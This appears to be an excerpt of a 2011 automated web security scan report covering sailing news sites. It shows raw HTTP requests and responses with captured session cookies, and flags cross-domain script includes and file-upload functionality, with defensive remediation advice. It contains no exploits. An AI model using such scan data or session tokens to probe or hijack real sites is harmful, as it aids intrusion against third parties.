Mui..a" title="The boat Mapfre Iker Martinez and Xabi Fernandez. | Mary Mui..a" /></a> ...[SNIP]... e_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/14/nautica/1295022007.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgKlAGrAyPMxeC8ZpWPc_rgv2yXOA><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/18/nautica/1295022007_extras_portadilla_0.jpg border=0 width=390 height=207 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... e_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/11/nautica/1294763396.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgnRGPCXwLuxhvFoOI8H7jt6FgwZQ><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/13/nautica/1294763396_extras_portadilla_0.jpg border=0 width=390 height=195 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... e_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/nautica/1295436349.html&prev=_t&rurl=translate.google.com&usg=ALkJrhjWxNrwgZSUcGb7oP4zcINz-oNCKg><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/nautica/1295436349_extras_portadilla_0.jpg border=0 width=230 height=167 alt="Iain Percy. | AMC" title="Iain Percy. | AMC" /></a> ...[SNIP]... e_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/14/nautica/1295005354.html&prev=_t&rurl=translate.google.com&usg=ALkJrhhFNQ-KTpJ4SkNzBeCPSOywBTjReg><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/17/nautica/1295005354_extras_portadilla_0.jpg border=0 width=230 height=149 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... te_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2010/12/16/espana/1292508988.html&prev=_t&rurl=translate.google.com&usg=ALkJrhiSmfhDdw8aA5y2Hh7XpUnUbw9iMQ><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2010/12/16/minidiario/1285753958_extras_noticia_foton_1_0.jpg border=0 width=135 height=120 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... </p><script type=text/javascript src=http://estaticos.elmundo.es/elmundo/js/carrusel.js></script> ...[SNIP]... te_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/america/2011/01/19/gentes/1295470180.html&prev=_t&rurl=translate.google.com&usg=ALkJrhi1aYr1A1snM4uA7v4cKALSkwktgg><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/20/carrusel/1295434538_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/encuentros/invitados/2011/01/4536/&prev=_t&rurl=translate.google.com&usg=ALkJrhiH9tgtmnGYHp6QS4A3tKmjHdzLng><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/20/carrusel/1295478011_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/paisvasco/1295465496.html&prev=_t&rurl=translate.google.com&usg=ALkJrhjJnEvjGUrERK7G_RQDZHYZ8EBHAQ><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295466842_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... _c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/america/2011/01/19/deportes/1295448673.html&prev=_t&rurl=translate.google.com&usg=ALkJrhi973LtbAPdK-jWlawjTnARS0WzmA><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295431358_1.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... l=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/comunicacion/1295435032.html&prev=_t&rurl=translate.google.com&usg=ALkJrhj2MTRrICKSAEca3DykQhlNVUYwjQ><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295459565_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... te_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/madrid/1295446980.html&prev=_t&rurl=translate.google.com&usg=ALkJrhhPN_v9a56-kxZ6yOmIsRx_ieVQhg><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295463730_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... ?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/television/1295433551.html&prev=_t&rurl=translate.google.com&usg=ALkJrhjg-M9_w-RLM5UekfZ8rvkhQjfoJQ><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295458093_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... n&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/gentes/fotos_gente/2011/01/19/index_9.html&prev=_t&rurl=translate.google.com&usg=ALkJrhiJgzb7bkOTguvkmrt3_HliUZNCIA><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295437457_0.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... ?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/19/suvivienda/1295425568.html&prev=_t&rurl=translate.google.com&usg=ALkJrhjWmJrNc6S_nmqZeK7HcQgDNQWR7Q><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295437374_1.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... =en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundosalud/2011/01/19/noticias/1295435617.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgtCKkbKew7h8w4Fua8LgA5Smz-xQ><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/carrusel/1295436693_1.jpg border=0 width=179 height=126 alt="[foto de la noticia]" title="[Photo from the news]" /></a> ...[SNIP]... <div class=foto><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295432801_extras_portada_0.jpg border=0 width=640 height=320 alt="Pintura de Robert Longo, Untitled (Monica in a Burka), 2010" title="Painting by Robert Longo, Untitled (Monica in a Burka), 2010" /></div> ...[SNIP]... <div class=foto><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295439092_extras_portada_0.jpg border=0 width=640 height=320 alt="[foto de la noticia]" title="[Photo from the news]" /></div> ...[SNIP]... <div class=foto><img src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295452047_extras_portada_0.jpg border=0 width=640 height=320 alt="[foto de la noticia]" title="[Photo from the news]" /></div> ...[SNIP]... <div class=foto><img src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295456010_extras_portada_0.jpg border=0 width=640 height=320 alt="[foto de la noticia]" title="[Photo from the news]" /></div> ...[SNIP]... <div class=foto><img src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295253093_extras_portada_2.jpg border=0 width=640 height=320 alt="[foto de la noticia]" title="[Photo from the news]" /></div> ...[SNIP]... </span><img rel=#1 alt="News 1" class=nav-thumb src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295432801_extras_noticia_foton_1_0.jpg /></li> ...[SNIP]... </span><img rel=#2 alt="News 2" class=nav-thumb src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295439092_extras_noticia_foton_1_0.jpg /></li> ...[SNIP]... </span><img rel=#3 alt="News 3" class=nav-thumb src=http://estaticos03.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295452047_extras_noticia_foton_1_0.jpg /></li> ...[SNIP]... </span><img rel=#4 alt="News 4" class=nav-thumb src=http://estaticos01.cache.el-mundo.net/elmundo/imagenes/2011/01/19/portada/1295456010_extras_noticia_foton_1_0.jpg /></li> ...[SNIP]... </span><img rel=#5 alt="News 5" class=nav-thumb src=http://estaticos02.cache.el-mundo.net/elmundo/imagenes/2011/01/17/portada/1295253093_extras_noticia_foton_1_0.jpg /></li> ...[SNIP]... <span class="google-src-text" style="direction: ltr; text-align: left"><a href=http://www.facebook.com/mundo.es title="Follow us on facebook">facebook</a></span> <a href=http://www.facebook.com/mundo.es title="Follow us on facebook">facebook</a> ...[SNIP]... <span class="google-src-text" style="direction: ltr; text-align: left"><a href=http://www.facebook.com/mundo.es>ELMUNDO.es en Facebook</a></span> <a href=http://www.facebook.com/mundo.es>ELMUNDO.es on Facebook</a> ...[SNIP]... <div class="enlaces_unedisa pie_elmundo"><img class=logo src=http://estaticos03.cache.el-mundo.net/elmundo/iconos/v4.x/v4.01/logo_elmundoes.gif alt="elmundo.es logo" /> <span onmouseover="_tipon(this)" onmouseout="_tipoff()"> ...[SNIP]... <!-- SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com --><script language=JavaScript type=text/javascript src=http://active.cache.el-mundo.net/js/s_codeE.js></script> ...[SNIP]... <noscript><img src=http://metrics.el-mundo.net/b/ss/ueglobaldev/1/H.21--NS/0 height=1 width=1 border=0 alt="" /></noscript> ...[SNIP]...
GET /index.php?lang=en&fn=folio&FolioID=83&co=1 HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:49 GMT Server: Apache Set-Cookie: PHPSESSID=ec7a22611c57b8147c7c5c0229457767; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 156568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media - ...[SNIP]... </span> <a href='http://www.net-folio.net/index.php?lng=en' target='_blank' class='mot2_footer'>Net-Folio</a></td> <td align='right' style='padding-right:20px;'> <a class='addthis_button' href='http://addthis.com/bookmark.php?v=250&pub=xa-4abb7f3a6673ddbf'><img src='http://s7.addthis.com/static/btn/v2/lg-share-en.gif' style='width:125px;height:16px' alt='Bookmark and Share' style='border:0'/></a><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf'></script> ...[SNIP]...
The page was loaded from a URL containing a query string:
http://www.bymnews.com/news/newsList.php?cat=2
The response contains the following link to another domain:
http://www.sea-tec.it/
Request
GET /news/newsList.php?cat=2 HTTP/1.1 Host: www.bymnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:23 GMT Server: Apache X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 50710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /submit?url=http://blip.tv/file/4639878&name=file HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www ...[SNIP]... <meta name="description" content="Submit a site to StumbleUpon" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... <p>In order to use Tuenti you must activate Javascript in your browser.Click to find out how to activate Javascript in <a href="http://support.microsoft.com/kb/873028/es" title="">Internet Explorer</a>, <a href="http://support.mozilla.com/es/kb/JavaScript" title="">Firefox</a>, or <a href="http://docs.info.apple.com/article.html?path=Safari/3.0/es/9279.html" title="">Safari</a> ...[SNIP]... <p>To use Tuenti you have to activate cookie support in your browser.Click to find out how to activate cookie support in <a href="http://support.microsoft.com/?scid=kb%3Bes%3B283185&x=22&y=10" title="">Internet Explorer</a>, <a href="http://support.mozilla.com/es/kb/Cookies+(espa%C3%B1ol)" title="">Firefox</a>, or <a href="http://docs.info.apple.com/article.html?path=Safari/3.0/es/9277.html" title="">Safari</a> ...[SNIP]...
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww ...[SNIP]... <p>In order to use Tuenti you must activate Javascript in your browser.Click to find out how to activate Javascript in <a href="http://support.microsoft.com/kb/873028/es" title="">Internet Explorer</a>, <a href="http://support.mozilla.com/es/kb/JavaScript" title="">Firefox</a>, or <a href="http://docs.info.apple.com/article.html?path=Safari/3.0/es/9279.html" title="">Safari</a> ...[SNIP]... <p>To use Tuenti you have to activate cookie support in your browser.Click to find out how to activate cookie support in <a href="http://support.microsoft.com/?scid=kb%3Bes%3B283185&x=22&y=10" title="">Internet Explorer</a>, <a href="http://support.mozilla.com/es/kb/Cookies+(espa%C3%B1ol)" title="">Firefox</a>, or <a href="http://docs.info.apple.com/article.html?path=Safari/3.0/es/9277.html" title="">Safari</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intercreate.com/
Request
GET /event_results_cumulative.cfm?eID=408 HTTP/1.1 Host: www.yachtscoring.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 20 Jan 2011 00:54:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=6963868;expires=Sat, 12-Jan-2041 00:54:29 GMT;path=/ Set-Cookie: CFTOKEN=60199100;expires=Sat, 12-Jan-2041 00:54:29 GMT;path=/ Set-Cookie: CFID=6963868;path=/ Set-Cookie: CFTOKEN=60199100;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML> <HEAD> <TITLE>Yacht Scoring - A complete web based r ...[SNIP]... <td valign="top" align="left"> Copyright © <a href="http://www.intercreate.com" target="_blank" style="font-size: 12px; color: gray">Interactive Creations</a> ...[SNIP]...
12. Cross-domain script includepreviousnext There are 20 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /index.php HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:36:56 GMT Server: Apache Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... </a><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf'></script> ...[SNIP]...
GET / HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Vary: Cookie X-otter-skin: blipnew Content-Type: text/html; charset=utf-8 Content-Length: 26922 Date: Thu, 20 Jan 2011 00:37:43 GMT X-Varnish: 1248899763 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
GET /posts?view=archive&nsfw=dc HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /posts HTTP/1.1 Host: armchairmango.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script> ...[SNIP]... </noscript>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> ...[SNIP]... <center> <script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script> ...[SNIP]... </script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET /creativeCommonsRssModule HTTP/1.1 Host: backend.userland.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Content-Length: 6733 Content-Type: text/html Date: Thu, 20 Jan 2011 00:36:55 GMT Server: UserLand Frontier/9.5-WinNT
GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/nautica.html&prev=_t&rurl=translate.google.com&usg=ALkJrhgbghhSU0mR1pBT2WU73fJ07Tz9LA HTTP/1.1 Host: translate.googleusercontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PREF=ID=4d976405d4b1f367:TM=1295482589:LM=1295482590:S=snr5DTM1C3a-1gdp;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:12 GMT Expires: Thu, 20 Jan 2011 00:44:12 GMT Cache-Control: private, max-age=86400 Accept-Ranges: none Content-Location: http://www.elmundo.es/elmundo/nautica.html Content-Type: text/html; charset=UTF-8 Content-Language: en X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function ti_a(b){this. ...[SNIP]... <![endif]--><script type=text/javascript src=http://estaticos.elmundo.es/js/accordian.js></script><script type=text/javascript src=http://estaticos.elmundo.es/js/pestanas_portal.js></script> ...[SNIP]... </script><script type=text/javascript src=http://active.cache.el-mundo.net/js/nielsen.js></script> ...[SNIP]... </div><script type=text/javascript language=JavaScript src=http://estaticos.elmundo.es/js/comunes.js></script> ...[SNIP]... </p><script type=text/javascript src=http://estaticos.elmundo.es/elmundo/js/carrusel.js></script> ...[SNIP]... <!-- SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com --><script language=JavaScript type=text/javascript src=http://active.cache.el-mundo.net/js/s_codeE.js></script> ...[SNIP]...
GET /index.php HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:48 GMT Server: Apache Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]... </a><script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4abb7f3a6673ddbf'></script> ...[SNIP]...
The response dynamically includes the following scripts from other domains:
http://connect.facebook.net/en_US/all.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1 Host: www.barcelonaworldrace.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 20 Jan 2011 00:45:06 GMT Server: Apache Connection: close Content-Type: text/html Set-Cookie: SERVERID=iom-web13; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!-- inclusion de la gestion des channel ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cea4ae8095ae3ba"></script> ...[SNIP]... <!-- elem id="499" --><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> ...[SNIP]...
GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:22:50 GMT Server: Apache Last-Modified: Thu, 19 Nov 2009 23:43:14 GMT ETag: "34a303-85e6-ec38a880" Accept-Ranges: bytes Content-Length: 34278 Vary: User-Agent Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> Sailboats, Catamarans, Sailing dinghies, Mainsails, Drysuits - NauticExpo </title>
GET /breymaiersailing.com HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:23:15 GMT Server: Apache Accept-Ranges: bytes Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 1984
<html> <head> <title>NetHere: URL Not Found (404)</title> <link rev="made" href="mailto:webmaster@sailinganarchy.com"> <style> a:link { color : #092769; } a:visited { color : #092769;
The response dynamically includes the following scripts from other domains:
http://ad.afy11.net/srad.js?azId=1000000238007
http://ad.afy11.net/srad.js?azId=1000000238307
http://edge.quantserve.com/quant.js
Request
GET /calendar/index.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:04 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 71420
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... </script> <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307"> </script> ...[SNIP]... </script> <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238007"> </script> ...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://ad.afy11.net/srad.js?azId=1000000238307
Request
GET /editor/audio_video.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:01 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 122549
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Sailin News and ...[SNIP]... </script> <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307"> </script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://ad.afy11.net/srad.js?azId=1000000238307
Request
GET /editor/pimpin.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:01 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 70163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Sailin News and ...[SNIP]... </script> <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307"> </script> ...[SNIP]...
GET /index_page2.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:24 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 96490
GET /submit HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:
File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
